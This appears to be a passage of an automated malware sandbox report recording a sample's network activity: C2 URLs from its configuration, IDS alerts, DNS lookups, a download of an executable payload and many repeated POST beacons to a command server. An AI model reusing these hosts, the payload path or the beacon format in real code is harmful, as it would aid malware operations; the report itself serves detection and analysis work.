Source: C:\Windows\explorer.exe	Network Connect: 123.213.233.131 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.181 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 189.163.166.52 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://obozintsev.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://olovge.at/tmp/index.php
Source: Malware configuration extractor	URLs: http://nuxc.cc/tmp/index.php
Source: Malware configuration extractor	URLs: http://piratekings.online/tmp/index.php

Source: Joe Sandbox View

IP Address: 123.213.233.131 123.213.233.131

Source: Joe Sandbox View	ASN Name: VECTANTARTERIANetworksCorporationJP VECTANTARTERIANetworksCorporationJP
Source: Joe Sandbox View	ASN Name: SKB-ASSKBroadbandCoLtdKR SKB-ASSKBroadbandCoLtdKR
Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49791 -> 23.145.40.181:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49875 -> 23.145.40.181:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49949 -> 207.246.75.248:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50064 -> 103.35.190.240:443

Source: global traffic	HTTP traffic detected: GET /prog/ctlg.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: midginvineco.com
Source: global traffic	HTTP traffic detected: GET /prog/ctlg.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: midginvineco.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://klvjvwlocecf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://totrulptsxj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fkyftbqjpntne.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vwrmkfcdqeqnf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ybhmruutgjll.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://idmlsaxfuvndeti.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dqwcacyxyiufxcg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vbibiexffybg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rcoksbrtpdmb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://limsldbbguqnsba.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://indpkapnwuhe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wdrrntcgtbyvfp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ehvxkgepwxtygl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tejbjmlbuatgr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://otfwaojfoxegoc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kqylhpxweftfa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fgrdwevlbrdtr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://natewkewlwih.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fhaalrvyqueiyk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ujchxvegkeooch.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pkapxutderw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dqdghghmtaygindm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ievirvwtsxbiyvql.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cdwxnwopeyrbni.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fgbhvviibbt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://miptxmfamtohobtx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jwqwkqwentbhrv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rtjqjvueogqtxkos.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ghrwspfuixcrwvx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qyqahwjnqtjwf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jjaaaitryycjvb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://reqhcetbeojgkny.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nsgtchrbqowj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kjjcaejlhnascj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ansopymmtehxip.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wyqtmqrstxfymqsq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ngsmolqmjlkr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xwimesajyti.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qasfskgmelreo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xgfnddjygdt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ciuapvhjnqxsxxwr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://egomlfgoxoteaymh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ewsvhrknjfqh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uqjegtiiabqrm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mdwlauviipmapdo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pjedtjbwdoay.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://buqwtxgqsqkupxr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lxgihqdoncikbgg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pktfnvaxqpxmxps.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gsuntxougdhs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://unxnurhhgcwb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cvixokerumeto.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fsnaumbblcik.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uwalktmlxvraf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://omlavaayevr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iopuyoenyjytdheg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xajywliqqhjs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: obozintsev.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cjnppqrvkvd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: obozintsev.ru

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /prog/ctlg.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: midginvineco.com
Source: global traffic	HTTP traffic detected: GET /prog/ctlg.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: midginvineco.com

Source: global traffic	DNS traffic detected: DNS query: obozintsev.ru
Source: global traffic	DNS traffic detected: DNS query: midginvineco.com
Source: global traffic	DNS traffic detected: DNS query: jamforvaise.com
Source: global traffic	DNS traffic detected: DNS query: telphboardline.com

Source: unknown

HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://klvjvwlocecf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: obozintsev.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 81 ed Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
